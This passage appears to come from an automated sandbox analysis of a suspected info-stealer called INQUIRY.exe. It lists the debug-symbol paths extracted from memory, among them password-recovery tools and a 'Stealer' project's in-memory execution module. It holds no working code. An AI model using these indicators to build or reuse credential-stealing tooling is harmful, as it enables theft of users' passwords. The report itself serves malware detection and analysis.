                    Source: Binary string: fastprox.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemsvc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winrnr.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: System.Runtime.Remoting.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: version.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wintrust.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorrc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb- source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmiutils.pdbbi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: psapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: WMINet_Utils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdbS source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdbee-c source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.699952597.0000000002BCD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776039564.0000000002E8A000.00000004.00000001.sdmp
                    Source: Binary string: tsymbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: combase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc.pdbThqia source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: 1_oC:\Windows\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: culture.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: crypt32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cfgmgr32.pdb; source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: edputil.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbE source: INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdbi source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: fltLib.pdb1 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wbemprox.pdbee source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.698848743.00000000049D4000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.777673272.0000000002E84000.00000004.00000001.sdmp
                    Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: NapiNSP.pdbJhgiX source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasapi32.pdb$hAi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: NapiNSP.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.711844278.0000000004EE0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793745442.0000000005270000.00000004.00000040.sdmp
                    Source: Binary string: profapi.pdb/ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.698202871.0000000002BC1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776011928.0000000002E7E000.00000004.00000001.sdmp
                    Source: Binary string: profapi.pdbkRi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cryptsp.pdb6hSi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winnsi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: secur32.pdb] source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\mscorlib.pdbd source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: winrnr.pdbo source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.711844278.0000000004EE0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793745442.0000000005270000.00000004.00000040.sdmp
                    Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cordacwks.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: schannel.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wuser32.pdbqa{ source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.699952597.0000000002BCD000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.776039564.0000000002E8A000.00000004.00000001.sdmp
                    Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: INQUIRY.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: INQUIRY.exe, vbc.exe, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: sxs.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rtutils.pdb? source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscoree.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: psapi.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wbemcomn.pdbxi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Z[zTs5.pdb6 source: INQUIRY.exe, 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp
                    Source: Binary string: cordacwks.pdb^hkiY source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Xml.pdb@hmi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: schannel.pdbG source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\diasymreader.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nsi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wwin32u.pdb) source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: security.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: dnsapi.pdb{ source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdbLhYiL source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msasn1.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbo source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp
                    Source: Binary string: sechost.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: DWrite.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: version.pdb7 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.698225687.0000000002BC7000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.777673272.0000000002E84000.00000004.00000001.sdmp
                    Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: secur32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb9 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ole32.pdb&kpir source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: mscoreei.pdb(kji source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\mscorlib.pdb source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: cordacwks.pdb# source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: .pdb* source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: secur32.pdbvi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdb5 source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msasn1.pdb! source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbe source: INQUIRY.exe, 00000001.00000002.738613444.00000000026F5000.00000004.00000040.sdmp, INQUIRY.exe, 00000010.00000002.826344655.0000000002455000.00000004.00000040.sdmp
                    Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcr80.i386.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: DWrite.pdbq source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: ws2_32.pdb.h;i source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasadhlp.pdb"hOi source: WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wgdi32.pdbk source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: nlaapi.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: winhttp.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorsec.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: wmiutils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
                    Source: Binary string: mscorwks.pdb% source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbH source: INQUIRY.exe, 00000001.00000002.746818566.0000000007C7A000.00000004.00000010.sdmp, INQUIRY.exe, 00000010.00000002.833872332.00000000078DA000.00000004.00000010.sdmp
                    Source: Binary string: rtutils.pdb source: WerFault.exe, 00000009.00000003.711608872.0000000004EEC000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.793383601.0000000005278000.00000004.00000040.sdmp
